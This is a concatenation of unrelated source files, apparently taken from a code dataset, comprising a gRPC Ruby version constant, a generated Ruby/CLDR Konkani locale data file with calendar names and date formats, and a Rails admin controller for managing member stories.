# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# GRPC contains the General RPC module.
module GRPC
  # Gem version; bumped by the grpc release tooling.
  VERSION = '1.26.0'
end
| 34.473684 | 74 | 0.755725 |
e920530c41f279ff70e0c7be09909cfa91b1812c | 24,028 | #
# a language data file for Ruby/CLDR
#
# Generated by: CLDR::Generator
#
# CLDR version: 1.3
#
# Original file name: common/main/kok_IN.xml
# Original file revision: 1.31 $
#
# Copyright (C) 2006 Masao Mutoh
#
# This file is distributed under the same license as the Ruby/CLDR.
#
private
def init_data
@localized_pattern_characters = "GyMdkHmsSEDFwWahKzYeugAZ"
@default = "gregorian"
@months = {}
@months[:gregorian] = {}
@months[:gregorian][:abbreviated] = {}
@months[:gregorian][:abbreviated]["1"] = "जानेवारी"
@months[:gregorian][:abbreviated]["10"] = "ओक्टोबर"
@months[:gregorian][:abbreviated]["11"] = "नोव्हेंबर"
@months[:gregorian][:abbreviated]["12"] = "डिसेंबर"
@months[:gregorian][:abbreviated]["2"] = "फेबृवारी"
@months[:gregorian][:abbreviated]["3"] = "मार्च"
@months[:gregorian][:abbreviated]["4"] = "एप्रिल"
@months[:gregorian][:abbreviated]["5"] = "मे"
@months[:gregorian][:abbreviated]["6"] = "जून"
@months[:gregorian][:abbreviated]["7"] = "जुलै"
@months[:gregorian][:abbreviated]["8"] = "ओगस्ट"
@months[:gregorian][:abbreviated]["9"] = "सेप्टेंबर"
@months[:gregorian][:narrow] = {}
@months[:gregorian][:narrow]["1"] = "1"
@months[:gregorian][:narrow]["10"] = "10"
@months[:gregorian][:narrow]["11"] = "11"
@months[:gregorian][:narrow]["12"] = "12"
@months[:gregorian][:narrow]["2"] = "2"
@months[:gregorian][:narrow]["3"] = "3"
@months[:gregorian][:narrow]["4"] = "4"
@months[:gregorian][:narrow]["5"] = "5"
@months[:gregorian][:narrow]["6"] = "6"
@months[:gregorian][:narrow]["7"] = "7"
@months[:gregorian][:narrow]["8"] = "8"
@months[:gregorian][:narrow]["9"] = "9"
@months[:gregorian][:wide] = {}
@months[:gregorian][:wide]["1"] = "जानेवारी"
@months[:gregorian][:wide]["10"] = "ओक्टोबर"
@months[:gregorian][:wide]["11"] = "नोव्हेंबर"
@months[:gregorian][:wide]["12"] = "डिसेंबर"
@months[:gregorian][:wide]["2"] = "फेब्रुवारी"
@months[:gregorian][:wide]["3"] = "मार्च"
@months[:gregorian][:wide]["4"] = "एप्रिल"
@months[:gregorian][:wide]["5"] = "मे"
@months[:gregorian][:wide]["6"] = "जून"
@months[:gregorian][:wide]["7"] = "जुलै"
@months[:gregorian][:wide]["8"] = "ओगस्ट"
@months[:gregorian][:wide]["9"] = "सेप्टेंबर"
@months[:hebrew] = {}
@months[:hebrew][:abbreviated] = {}
@months[:hebrew][:abbreviated]["1"] = "Tishri"
@months[:hebrew][:abbreviated]["10"] = "Sivan"
@months[:hebrew][:abbreviated]["11"] = "Tamuz"
@months[:hebrew][:abbreviated]["12"] = "Av"
@months[:hebrew][:abbreviated]["13"] = "Elul"
@months[:hebrew][:abbreviated]["2"] = "Heshvan"
@months[:hebrew][:abbreviated]["3"] = "Kislev"
@months[:hebrew][:abbreviated]["4"] = "Tevet"
@months[:hebrew][:abbreviated]["5"] = "Shevat"
@months[:hebrew][:abbreviated]["6"] = "Adar I"
@months[:hebrew][:abbreviated]["7"] = "Adar"
@months[:hebrew][:abbreviated]["8"] = "Nisan"
@months[:hebrew][:abbreviated]["9"] = "Iyar"
@months[:hebrew][:wide] = {}
@months[:hebrew][:wide]["1"] = "Tishri"
@months[:hebrew][:wide]["10"] = "Sivan"
@months[:hebrew][:wide]["11"] = "Tamuz"
@months[:hebrew][:wide]["12"] = "Av"
@months[:hebrew][:wide]["13"] = "Elul"
@months[:hebrew][:wide]["2"] = "Heshvan"
@months[:hebrew][:wide]["3"] = "Kislev"
@months[:hebrew][:wide]["4"] = "Tevet"
@months[:hebrew][:wide]["5"] = "Shevat"
@months[:hebrew][:wide]["6"] = "Adar I"
@months[:hebrew][:wide]["7"] = "Adar"
@months[:hebrew][:wide]["8"] = "Nisan"
@months[:hebrew][:wide]["9"] = "Iyar"
@months[:islamic_civil] = {}
@months[:islamic_civil][:abbreviated] = {}
@months[:islamic_civil][:abbreviated]["1"] = "Muharram"
@months[:islamic_civil][:abbreviated]["10"] = "Shawwal"
@months[:islamic_civil][:abbreviated]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic_civil][:abbreviated]["12"] = "Dhuʻl-Hijjah"
@months[:islamic_civil][:abbreviated]["2"] = "Safar"
@months[:islamic_civil][:abbreviated]["3"] = "Rabiʻ I"
@months[:islamic_civil][:abbreviated]["4"] = "Rabiʻ II"
@months[:islamic_civil][:abbreviated]["5"] = "Jumada I"
@months[:islamic_civil][:abbreviated]["6"] = "Jumada II"
@months[:islamic_civil][:abbreviated]["7"] = "Rajab"
@months[:islamic_civil][:abbreviated]["8"] = "Shaʻban"
@months[:islamic_civil][:abbreviated]["9"] = "Ramadan"
@months[:islamic_civil][:wide] = {}
@months[:islamic_civil][:wide]["1"] = "Muharram"
@months[:islamic_civil][:wide]["10"] = "Shawwal"
@months[:islamic_civil][:wide]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic_civil][:wide]["12"] = "Dhuʻl-Hijjah"
@months[:islamic_civil][:wide]["2"] = "Safar"
@months[:islamic_civil][:wide]["3"] = "Rabiʻ I"
@months[:islamic_civil][:wide]["4"] = "Rabiʻ II"
@months[:islamic_civil][:wide]["5"] = "Jumada I"
@months[:islamic_civil][:wide]["6"] = "Jumada II"
@months[:islamic_civil][:wide]["7"] = "Rajab"
@months[:islamic_civil][:wide]["8"] = "Shaʻban"
@months[:islamic_civil][:wide]["9"] = "Ramadan"
@months[:islamic] = {}
@months[:islamic][:abbreviated] = {}
@months[:islamic][:abbreviated]["1"] = "Muharram"
@months[:islamic][:abbreviated]["10"] = "Shawwal"
@months[:islamic][:abbreviated]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic][:abbreviated]["12"] = "Dhuʻl-Hijjah"
@months[:islamic][:abbreviated]["2"] = "Safar"
@months[:islamic][:abbreviated]["3"] = "Rabiʻ I"
@months[:islamic][:abbreviated]["4"] = "Rabiʻ II"
@months[:islamic][:abbreviated]["5"] = "Jumada I"
@months[:islamic][:abbreviated]["6"] = "Jumada II"
@months[:islamic][:abbreviated]["7"] = "Rajab"
@months[:islamic][:abbreviated]["8"] = "Shaʻban"
@months[:islamic][:abbreviated]["9"] = "Ramadan"
@months[:islamic][:wide] = {}
@months[:islamic][:wide]["1"] = "Muharram"
@months[:islamic][:wide]["10"] = "Shawwal"
@months[:islamic][:wide]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic][:wide]["12"] = "Dhuʻl-Hijjah"
@months[:islamic][:wide]["2"] = "Safar"
@months[:islamic][:wide]["3"] = "Rabiʻ I"
@months[:islamic][:wide]["4"] = "Rabiʻ II"
@months[:islamic][:wide]["5"] = "Jumada I"
@months[:islamic][:wide]["6"] = "Jumada II"
@months[:islamic][:wide]["7"] = "Rajab"
@months[:islamic][:wide]["8"] = "Shaʻban"
@months[:islamic][:wide]["9"] = "Ramadan"
@months[:persian] = {}
@months[:persian][:abbreviated] = {}
@months[:persian][:abbreviated]["1"] = "Farvardin"
@months[:persian][:abbreviated]["10"] = "Dey"
@months[:persian][:abbreviated]["11"] = "Bahman"
@months[:persian][:abbreviated]["12"] = "Esfand"
@months[:persian][:abbreviated]["2"] = "Ordibehesht"
@months[:persian][:abbreviated]["3"] = "Khordad"
@months[:persian][:abbreviated]["4"] = "Tir"
@months[:persian][:abbreviated]["5"] = "Mordad"
@months[:persian][:abbreviated]["6"] = "Shahrivar"
@months[:persian][:abbreviated]["7"] = "Mehr"
@months[:persian][:abbreviated]["8"] = "Aban"
@months[:persian][:abbreviated]["9"] = "Azar"
@months[:persian][:wide] = {}
@months[:persian][:wide]["1"] = "Farvardin"
@months[:persian][:wide]["10"] = "Dey"
@months[:persian][:wide]["11"] = "Bahman"
@months[:persian][:wide]["12"] = "Esfand"
@months[:persian][:wide]["2"] = "Ordibehesht"
@months[:persian][:wide]["3"] = "Khordad"
@months[:persian][:wide]["4"] = "Tir"
@months[:persian][:wide]["5"] = "Mordad"
@months[:persian][:wide]["6"] = "Shahrivar"
@months[:persian][:wide]["7"] = "Mehr"
@months[:persian][:wide]["8"] = "Aban"
@months[:persian][:wide]["9"] = "Azar"
@monthformat_defaults = {}
@monthformat_defaults["gregorian"] = "wide"
@monthformat_defaults["hebrew"] = "wide"
@monthformat_defaults["islamic"] = "wide"
@monthformat_defaults["islamic-civil"] = "wide"
@monthformat_defaults["persian"] = "wide"
@days = {}
@days[:gregorian] = {}
@days[:gregorian][:abbreviated] = {}
@days[:gregorian][:abbreviated]["fri"] = "शुक्र"
@days[:gregorian][:abbreviated]["mon"] = "सोम"
@days[:gregorian][:abbreviated]["sat"] = "शनि"
@days[:gregorian][:abbreviated]["sun"] = "रवि"
@days[:gregorian][:abbreviated]["thu"] = "गुरु"
@days[:gregorian][:abbreviated]["tue"] = "मंगळ"
@days[:gregorian][:abbreviated]["wed"] = "बुध"
@days[:gregorian][:narrow] = {}
@days[:gregorian][:narrow]["fri"] = "6"
@days[:gregorian][:narrow]["mon"] = "2"
@days[:gregorian][:narrow]["sat"] = "7"
@days[:gregorian][:narrow]["sun"] = "1"
@days[:gregorian][:narrow]["thu"] = "5"
@days[:gregorian][:narrow]["tue"] = "3"
@days[:gregorian][:narrow]["wed"] = "4"
@days[:gregorian][:wide] = {}
@days[:gregorian][:wide]["fri"] = "शुक्रवार"
@days[:gregorian][:wide]["mon"] = "सोमवार"
@days[:gregorian][:wide]["sat"] = "शनिवार"
@days[:gregorian][:wide]["sun"] = "आदित्यवार"
@days[:gregorian][:wide]["thu"] = "गुरुवार"
@days[:gregorian][:wide]["tue"] = "मंगळार"
@days[:gregorian][:wide]["wed"] = "बुधवार"
@dayformat_defaults = {}
@dayformat_defaults["gregorian"] = "wide"
@week_firstdays = {}
@week_firstdays["gregorian"] = "mon"
@weekend_starts = {}
@weekend_starts["gregorian"] = "sun"
@weekend_ends = {}
@weekend_ends["gregorian"] = "sun"
@mindays = {}
@mindays["gregorian"] = "1"
@am = {}
@am["gregorian"] = "म.पू."
@pm = {}
@pm["gregorian"] = "म.नं."
@era_names = {}
@era_abbrs = {}
@era_abbrs[:buddhist] = {}
@era_abbrs[:buddhist]["0"] = "BE"
@era_abbrs[:gregorian] = {}
@era_abbrs[:gregorian]["0"] = "क्रिस्तपूर्व"
@era_abbrs[:gregorian]["1"] = "क्रिस्तशखा"
@era_abbrs[:hebrew] = {}
@era_abbrs[:hebrew]["0"] = "AM"
@era_abbrs[:islamic_civil] = {}
@era_abbrs[:islamic_civil]["0"] = "AH"
@era_abbrs[:islamic] = {}
@era_abbrs[:islamic]["0"] = "AH"
@era_abbrs[:japanese] = {}
@era_abbrs[:japanese]["0"] = "Taika"
@era_abbrs[:japanese]["1"] = "Hakuchi"
@era_abbrs[:japanese]["10"] = "Tempyō"
@era_abbrs[:japanese]["100"] = "Kaō"
@era_abbrs[:japanese]["101"] = "Shōan"
@era_abbrs[:japanese]["102"] = "Angen"
@era_abbrs[:japanese]["103"] = "Jishō"
@era_abbrs[:japanese]["104"] = "Yōwa"
@era_abbrs[:japanese]["105"] = "Juei"
@era_abbrs[:japanese]["106"] = "Genryuku"
@era_abbrs[:japanese]["107"] = "Bunji"
@era_abbrs[:japanese]["108"] = "Kenkyū"
@era_abbrs[:japanese]["109"] = "Shōji"
@era_abbrs[:japanese]["11"] = "Tempyō-kampō"
@era_abbrs[:japanese]["110"] = "Kennin"
@era_abbrs[:japanese]["111"] = "Genkyū"
@era_abbrs[:japanese]["112"] = "Ken-ei"
@era_abbrs[:japanese]["113"] = "Shōgen"
@era_abbrs[:japanese]["114"] = "Kenryaku"
@era_abbrs[:japanese]["115"] = "Kenpō"
@era_abbrs[:japanese]["116"] = "Shōkyū"
@era_abbrs[:japanese]["117"] = "Jōō"
@era_abbrs[:japanese]["118"] = "Gennin"
@era_abbrs[:japanese]["119"] = "Karoku"
@era_abbrs[:japanese]["12"] = "Tempyō-shōhō"
@era_abbrs[:japanese]["120"] = "Antei"
@era_abbrs[:japanese]["121"] = "Kanki"
@era_abbrs[:japanese]["122"] = "Jōei"
@era_abbrs[:japanese]["123"] = "Tempuku"
@era_abbrs[:japanese]["124"] = "Bunryaku"
@era_abbrs[:japanese]["125"] = "Katei"
@era_abbrs[:japanese]["126"] = "Ryakunin"
@era_abbrs[:japanese]["127"] = "En-ō"
@era_abbrs[:japanese]["128"] = "Ninji"
@era_abbrs[:japanese]["129"] = "Kangen"
@era_abbrs[:japanese]["13"] = "Tempyō-hōji"
@era_abbrs[:japanese]["130"] = "Hōji"
@era_abbrs[:japanese]["131"] = "Kenchō"
@era_abbrs[:japanese]["132"] = "Kōgen"
@era_abbrs[:japanese]["133"] = "Shōka"
@era_abbrs[:japanese]["134"] = "Shōgen"
@era_abbrs[:japanese]["135"] = "Bun-ō"
@era_abbrs[:japanese]["136"] = "Kōchō"
@era_abbrs[:japanese]["137"] = "Bun-ei"
@era_abbrs[:japanese]["138"] = "Kenji"
@era_abbrs[:japanese]["139"] = "Kōan"
@era_abbrs[:japanese]["14"] = "Temphō-jingo"
@era_abbrs[:japanese]["140"] = "Shōō"
@era_abbrs[:japanese]["141"] = "Einin"
@era_abbrs[:japanese]["142"] = "Shōan"
@era_abbrs[:japanese]["143"] = "Kengen"
@era_abbrs[:japanese]["144"] = "Kagen"
@era_abbrs[:japanese]["145"] = "Tokuji"
@era_abbrs[:japanese]["146"] = "Enkei"
@era_abbrs[:japanese]["147"] = "Ōchō"
@era_abbrs[:japanese]["148"] = "Shōwa"
@era_abbrs[:japanese]["149"] = "Bunpō"
@era_abbrs[:japanese]["15"] = "Jingo-keiun"
@era_abbrs[:japanese]["150"] = "Genō"
@era_abbrs[:japanese]["151"] = "Genkyō"
@era_abbrs[:japanese]["152"] = "Shōchū"
@era_abbrs[:japanese]["153"] = "Kareki"
@era_abbrs[:japanese]["154"] = "Gentoku"
@era_abbrs[:japanese]["155"] = "Genkō"
@era_abbrs[:japanese]["156"] = "Kemmu"
@era_abbrs[:japanese]["157"] = "Engen"
@era_abbrs[:japanese]["158"] = "Kōkoku"
@era_abbrs[:japanese]["159"] = "Shōhei"
@era_abbrs[:japanese]["16"] = "Hōki"
@era_abbrs[:japanese]["160"] = "Kentoku"
@era_abbrs[:japanese]["161"] = "Bunchũ"
@era_abbrs[:japanese]["162"] = "Tenju"
@era_abbrs[:japanese]["163"] = "Kōryaku"
@era_abbrs[:japanese]["164"] = "Kōwa"
@era_abbrs[:japanese]["165"] = "Genchũ"
@era_abbrs[:japanese]["166"] = "Meitoku"
@era_abbrs[:japanese]["167"] = "Kakei"
@era_abbrs[:japanese]["168"] = "Kōō"
@era_abbrs[:japanese]["169"] = "Meitoku"
@era_abbrs[:japanese]["17"] = "Ten-ō"
@era_abbrs[:japanese]["170"] = "Ōei"
@era_abbrs[:japanese]["171"] = "Shōchō"
@era_abbrs[:japanese]["172"] = "Eikyō"
@era_abbrs[:japanese]["173"] = "Kakitsu"
@era_abbrs[:japanese]["174"] = "Bun-an"
@era_abbrs[:japanese]["175"] = "Hōtoku"
@era_abbrs[:japanese]["176"] = "Kyōtoku"
@era_abbrs[:japanese]["177"] = "Kōshō"
@era_abbrs[:japanese]["178"] = "Chōroku"
@era_abbrs[:japanese]["179"] = "Kanshō"
@era_abbrs[:japanese]["18"] = "Enryaku"
@era_abbrs[:japanese]["180"] = "Bunshō"
@era_abbrs[:japanese]["181"] = "Ōnin"
@era_abbrs[:japanese]["182"] = "Bunmei"
@era_abbrs[:japanese]["183"] = "Chōkyō"
@era_abbrs[:japanese]["184"] = "Entoku"
@era_abbrs[:japanese]["185"] = "Meiō"
@era_abbrs[:japanese]["186"] = "Bunki"
@era_abbrs[:japanese]["187"] = "Eishō"
@era_abbrs[:japanese]["188"] = "Taiei"
@era_abbrs[:japanese]["189"] = "Kyōroku"
@era_abbrs[:japanese]["19"] = "Daidō"
@era_abbrs[:japanese]["190"] = "Tenmon"
@era_abbrs[:japanese]["191"] = "Kōji"
@era_abbrs[:japanese]["192"] = "Eiroku"
@era_abbrs[:japanese]["193"] = "Genki"
@era_abbrs[:japanese]["194"] = "Tenshō"
@era_abbrs[:japanese]["195"] = "Bunroku"
@era_abbrs[:japanese]["196"] = "Keichō"
@era_abbrs[:japanese]["197"] = "Genwa"
@era_abbrs[:japanese]["198"] = "Kan-ei"
@era_abbrs[:japanese]["199"] = "Shōho"
@era_abbrs[:japanese]["2"] = "Hakuhō"
@era_abbrs[:japanese]["20"] = "Kōnin"
@era_abbrs[:japanese]["200"] = "Keian"
@era_abbrs[:japanese]["201"] = "Shōō"
@era_abbrs[:japanese]["202"] = "Meiryaku"
@era_abbrs[:japanese]["203"] = "Manji"
@era_abbrs[:japanese]["204"] = "Kanbun"
@era_abbrs[:japanese]["205"] = "Enpō"
@era_abbrs[:japanese]["206"] = "Tenwa"
@era_abbrs[:japanese]["207"] = "Jōkyō"
@era_abbrs[:japanese]["208"] = "Genroku"
@era_abbrs[:japanese]["209"] = "Hōei"
@era_abbrs[:japanese]["21"] = "Tenchō"
@era_abbrs[:japanese]["210"] = "Shōtoku"
@era_abbrs[:japanese]["211"] = "Kyōhō"
@era_abbrs[:japanese]["212"] = "Genbun"
@era_abbrs[:japanese]["213"] = "Kanpō"
@era_abbrs[:japanese]["214"] = "Enkyō"
@era_abbrs[:japanese]["215"] = "Kan-en"
@era_abbrs[:japanese]["216"] = "Hōryaku"
@era_abbrs[:japanese]["217"] = "Meiwa"
@era_abbrs[:japanese]["218"] = "An-ei"
@era_abbrs[:japanese]["219"] = "Tenmei"
@era_abbrs[:japanese]["22"] = "Shōwa"
@era_abbrs[:japanese]["220"] = "Kansei"
@era_abbrs[:japanese]["221"] = "Kyōwa"
@era_abbrs[:japanese]["222"] = "Bunka"
@era_abbrs[:japanese]["223"] = "Bunsei"
@era_abbrs[:japanese]["224"] = "Tenpō"
@era_abbrs[:japanese]["225"] = "Kōka"
@era_abbrs[:japanese]["226"] = "Kaei"
@era_abbrs[:japanese]["227"] = "Ansei"
@era_abbrs[:japanese]["228"] = "Man-en"
@era_abbrs[:japanese]["229"] = "Bunkyū"
@era_abbrs[:japanese]["23"] = "Kajō"
@era_abbrs[:japanese]["230"] = "Genji"
@era_abbrs[:japanese]["231"] = "Keiō"
@era_abbrs[:japanese]["232"] = "Meiji"
@era_abbrs[:japanese]["233"] = "Taishō"
@era_abbrs[:japanese]["234"] = "Shōwa"
@era_abbrs[:japanese]["235"] = "Heisei"
@era_abbrs[:japanese]["24"] = "Ninju"
@era_abbrs[:japanese]["25"] = "Saiko"
@era_abbrs[:japanese]["26"] = "Tennan"
@era_abbrs[:japanese]["27"] = "Jōgan"
@era_abbrs[:japanese]["28"] = "Genkei"
@era_abbrs[:japanese]["29"] = "Ninna"
@era_abbrs[:japanese]["3"] = "Shuchō"
@era_abbrs[:japanese]["30"] = "Kampyō"
@era_abbrs[:japanese]["31"] = "Shōtai"
@era_abbrs[:japanese]["32"] = "Engi"
@era_abbrs[:japanese]["33"] = "Enchō"
@era_abbrs[:japanese]["34"] = "Shōhei"
@era_abbrs[:japanese]["35"] = "Tengyō"
@era_abbrs[:japanese]["36"] = "Tenryaku"
@era_abbrs[:japanese]["37"] = "Tentoku"
@era_abbrs[:japanese]["38"] = "Ōwa"
@era_abbrs[:japanese]["39"] = "Kōhō"
@era_abbrs[:japanese]["4"] = "Taihō"
@era_abbrs[:japanese]["40"] = "Anna"
@era_abbrs[:japanese]["41"] = "Tenroku"
@era_abbrs[:japanese]["42"] = "Ten-en"
@era_abbrs[:japanese]["43"] = "Jōgen"
@era_abbrs[:japanese]["44"] = "Tengen"
@era_abbrs[:japanese]["45"] = "Eikan"
@era_abbrs[:japanese]["46"] = "Kanna"
@era_abbrs[:japanese]["47"] = "Ei-en"
@era_abbrs[:japanese]["48"] = "Eiso"
@era_abbrs[:japanese]["49"] = "Shōryaku"
@era_abbrs[:japanese]["5"] = "Keiun"
@era_abbrs[:japanese]["50"] = "Chōtoku"
@era_abbrs[:japanese]["51"] = "Chōhō"
@era_abbrs[:japanese]["52"] = "Kankō"
@era_abbrs[:japanese]["53"] = "Chōwa"
@era_abbrs[:japanese]["54"] = "Kannin"
@era_abbrs[:japanese]["55"] = "Jian"
@era_abbrs[:japanese]["56"] = "Manju"
@era_abbrs[:japanese]["57"] = "Chōgen"
@era_abbrs[:japanese]["58"] = "Chōryaku"
@era_abbrs[:japanese]["59"] = "Chōkyū"
@era_abbrs[:japanese]["6"] = "Wadō"
@era_abbrs[:japanese]["60"] = "Kantoku"
@era_abbrs[:japanese]["61"] = "Eishō"
@era_abbrs[:japanese]["62"] = "Tengi"
@era_abbrs[:japanese]["63"] = "Kōhei"
@era_abbrs[:japanese]["64"] = "Jiryaku"
@era_abbrs[:japanese]["65"] = "Enkyū"
@era_abbrs[:japanese]["66"] = "Shōho"
@era_abbrs[:japanese]["67"] = "Shōryaku"
@era_abbrs[:japanese]["68"] = "Eiho"
@era_abbrs[:japanese]["69"] = "Ōtoku"
@era_abbrs[:japanese]["7"] = "Reiki"
@era_abbrs[:japanese]["70"] = "Kanji"
@era_abbrs[:japanese]["71"] = "Kaho"
@era_abbrs[:japanese]["72"] = "Eichō"
@era_abbrs[:japanese]["73"] = "Shōtoku"
@era_abbrs[:japanese]["74"] = "Kōwa"
@era_abbrs[:japanese]["75"] = "Chōji"
@era_abbrs[:japanese]["76"] = "Kashō"
@era_abbrs[:japanese]["77"] = "Tennin"
@era_abbrs[:japanese]["78"] = "Ten-ei"
@era_abbrs[:japanese]["79"] = "Eikyū"
@era_abbrs[:japanese]["8"] = "Yōrō"
@era_abbrs[:japanese]["80"] = "Gen-ei"
@era_abbrs[:japanese]["81"] = "Hoan"
@era_abbrs[:japanese]["82"] = "Tenji"
@era_abbrs[:japanese]["83"] = "Daiji"
@era_abbrs[:japanese]["84"] = "Tenshō"
@era_abbrs[:japanese]["85"] = "Chōshō"
@era_abbrs[:japanese]["86"] = "Hoen"
@era_abbrs[:japanese]["87"] = "Eiji"
@era_abbrs[:japanese]["88"] = "Kōji"
@era_abbrs[:japanese]["89"] = "Tenyō"
@era_abbrs[:japanese]["9"] = "Jinki"
@era_abbrs[:japanese]["90"] = "Kyūan"
@era_abbrs[:japanese]["91"] = "Ninpei"
@era_abbrs[:japanese]["92"] = "Kyūju"
@era_abbrs[:japanese]["93"] = "Hogen"
@era_abbrs[:japanese]["94"] = "Heiji"
@era_abbrs[:japanese]["95"] = "Eiryaku"
@era_abbrs[:japanese]["96"] = "Ōho"
@era_abbrs[:japanese]["97"] = "Chōkan"
@era_abbrs[:japanese]["98"] = "Eiman"
@era_abbrs[:japanese]["99"] = "Nin-an"
@era_abbrs[:persian] = {}
@era_abbrs[:persian]["0"] = "AP"
@dateformats = {}
@dateformats[:buddhist] = {}
@dateformats[:buddhist]["full"] = "EEEE, MMMM d, yyyy G"
@dateformats[:buddhist]["long"] = "MMMM d, yyyy G"
@dateformats[:buddhist]["medium"] = "MMM d, yyyy G"
@dateformats[:buddhist]["short"] = "M/d/yyyy"
@dateformats[:chinese] = {}
@dateformats[:chinese]["full"] = "EEEE y'x'G-Ml-d"
@dateformats[:chinese]["long"] = "y'x'G-Ml-d"
@dateformats[:chinese]["medium"] = "y'x'G-Ml-d"
@dateformats[:chinese]["short"] = "y'x'G-Ml-d"
@dateformats[:gregorian] = {}
@dateformats[:gregorian]["full"] = "EEEE d MMMM yyyy"
@dateformats[:gregorian]["long"] = "d MMMM yyyy"
@dateformats[:gregorian]["medium"] = "dd-MM-yyyy"
@dateformats[:gregorian]["short"] = "d-M-yy"
@dateformats[:japanese] = {}
@dateformats[:japanese]["full"] = "EEEE, MMMM d, y G"
@dateformats[:japanese]["long"] = "MMMM d, y G"
@dateformats[:japanese]["medium"] = "MMM d, y G"
@dateformats[:japanese]["short"] = "M/d/yy"
@dateformat_defaults = {}
@dateformat_defaults["buddhist"] = "medium"
@dateformat_defaults["chinese"] = "medium"
@dateformat_defaults["gregorian"] = "medium"
@dateformat_defaults["japanese"] = "medium"
@timeformats = {}
@timeformats[:buddhist] = {}
@timeformats[:buddhist]["full"] = "h:mm:ss a z"
@timeformats[:buddhist]["long"] = "h:mm:ss a z"
@timeformats[:buddhist]["medium"] = "h:mm:ss a"
@timeformats[:buddhist]["short"] = "h:mm a"
@timeformats[:chinese] = {}
@timeformats[:chinese]["full"] = "h:mm:ss a z"
@timeformats[:chinese]["long"] = "h:mm:ss a z"
@timeformats[:chinese]["medium"] = "h:mm:ss a"
@timeformats[:chinese]["short"] = "h:mm a"
@timeformats[:gregorian] = {}
@timeformats[:gregorian]["full"] = "h:mm:ss a z"
@timeformats[:gregorian]["long"] = "h:mm:ss a z"
@timeformats[:gregorian]["medium"] = "h:mm:ss a"
@timeformats[:gregorian]["short"] = "h:mm a"
@timeformats[:japanese] = {}
@timeformats[:japanese]["full"] = "h:mm:ss a z"
@timeformats[:japanese]["long"] = "h:mm:ss a z"
@timeformats[:japanese]["medium"] = "h:mm:ss a"
@timeformats[:japanese]["short"] = "h:mm a"
@timeformat_defaults = {}
@timeformat_defaults["buddhist"] = "medium"
@timeformat_defaults["chinese"] = "medium"
@timeformat_defaults["gregorian"] = "medium"
@timeformat_defaults["japanese"] = "medium"
@datetimeformats = {}
@datetimeformats["buddhist"] = "{1} {0}"
@datetimeformats["chinese"] = "{1} {0}"
@datetimeformats["gregorian"] = "{1} {0}"
@datetimeformats["japanese"] = "{1} {0}"
@fields = {}
@fields[:gregorian] = {}
@fields[:gregorian]["day"] = "Day"
@fields[:gregorian]["dayperiod"] = "Dayperiod"
@fields[:gregorian]["era"] = "Era"
@fields[:gregorian]["hour"] = "Hour"
@fields[:gregorian]["minute"] = "Minute"
@fields[:gregorian]["month"] = "Month"
@fields[:gregorian]["second"] = "Second"
@fields[:gregorian]["week"] = "Week"
@fields[:gregorian]["weekday"] = "Day of the Week"
@fields[:gregorian]["year"] = "Year"
@fields[:gregorian]["zone"] = "Zone"
@field_relatives = {}
end
public

# Read-only access to the locale/calendar data populated during
# initialization (see the assignments above).
attr_reader :localized_pattern_characters
attr_reader :default
# Month and day names plus their default display formats.
attr_reader :months
attr_reader :monthformat_defaults
attr_reader :days
attr_reader :dayformat_defaults
# Week structure: first weekday, weekend boundaries, minimum days in week.
attr_reader :week_firstdays
attr_reader :weekend_starts
attr_reader :weekend_ends
attr_reader :mindays
# Day-period markers (ante/post meridiem).
attr_reader :am
attr_reader :pm
# Era data keyed by calendar symbol (:japanese and :persian are set above).
attr_reader :era_names
attr_reader :era_abbrs
# Date/time/date-time patterns per calendar, plus the default length
# ("full"/"long"/"medium"/"short") for each calendar.
attr_reader :dateformats
attr_reader :dateformat_defaults
attr_reader :timeformats
attr_reader :timeformat_defaults
attr_reader :datetimeformats
# Field display names (e.g. "Day of the Week") and relative-field data.
attr_reader :fields
attr_reader :field_relatives
| 42.602837 | 67 | 0.58282 |
bf93480b089ee029b392332b6e4e7503379673be | 2,554 | class Admin::MemberStoriesController < Admin::BaseController
  include NewsItemMethods

  # Widget lookup must run before the item lookup below relies on it.
  before_filter :setup
  before_filter :get_news_item, :only => [:show, :update, :edit, :destroy]
  # Expire cached member-story fragments on every write action.
  cache_sweeper :member_stories_sweeper, :only => [:create, :update, :destroy]
  uses_tiny_mce(:options => GlobalConfig.advanced_mce_options.merge(:language => 'tr'),
                :raw_options => GlobalConfig.raw_mce_options,
                :only => [:new, :create, :edit, :update])

  # GET /admin/member_stories — paginated list; JSON serves autocomplete URLs.
  def index
    @news_items = @widget.news_items.paginate(:page => @page, :per_page => @per_page)
    respond_to do |format|
      format.html # index.html.erb
      format.xml { render :xml => @news_items }
      format.json do
        root_part = admin_member_stories_path + '/'
        render :json => autocomplete_urls_json(@news_items, root_part)
      end
    end
  end

  # GET /admin/member_stories/:id — @news_item is loaded by the before_filter.
  def show
    render
  end

  # GET /admin/member_stories/new
  def new
    @news_item = @widget.news_items.build
    respond_to do |format|
      format.html # new.html.erb
      format.xml { render :xml => @news_item }
    end
  end

  # GET /admin/member_stories/:id/edit — @news_item loaded by before_filter.
  def edit
    render
  end

  # POST /admin/member_stories — builds the story under the widget.
  def create
    @news_item = @widget.news_items.build(params[:news_item])
    saved = @news_item.save
    respond_to do |format|
      if saved
        flash[:notice] = 'Member Story was successfully created.'
        format.html { redirect_to admin_member_stories_url }
        format.xml { render :xml => @news_item, :status => :created, :location => @widget }
      else
        format.html { render :action => "new" }
        format.xml { render :xml => @news_item.errors, :status => :unprocessable_entity }
      end
    end
  end

  # PUT /admin/member_stories/:id
  def update
    respond_to do |format|
      if @news_item.update_attributes(params[:news_item])
        flash[:notice] = "Member story '#{@news_item.title}' was successfully updated."
        format.html { redirect_to admin_member_stories_url }
        format.xml { head :ok }
      else
        format.html { render :action => "edit" }
        format.xml { render :xml => @news_item.errors, :status => :unprocessable_entity }
      end
    end
  end

  # DELETE /admin/member_stories/:id
  def destroy
    @news_item.destroy
    flash[:notice] = "Member story '#{@news_item.title}' was successfully deleted."
    respond_to do |format|
      format.html { redirect_to admin_member_stories_url }
      format.xml { head :ok }
    end
  end

  private

  # Member stories all hang off a single named widget, created on demand.
  def setup
    @widget = Widget.find_or_create_by_name(:member_stories)
  end
end
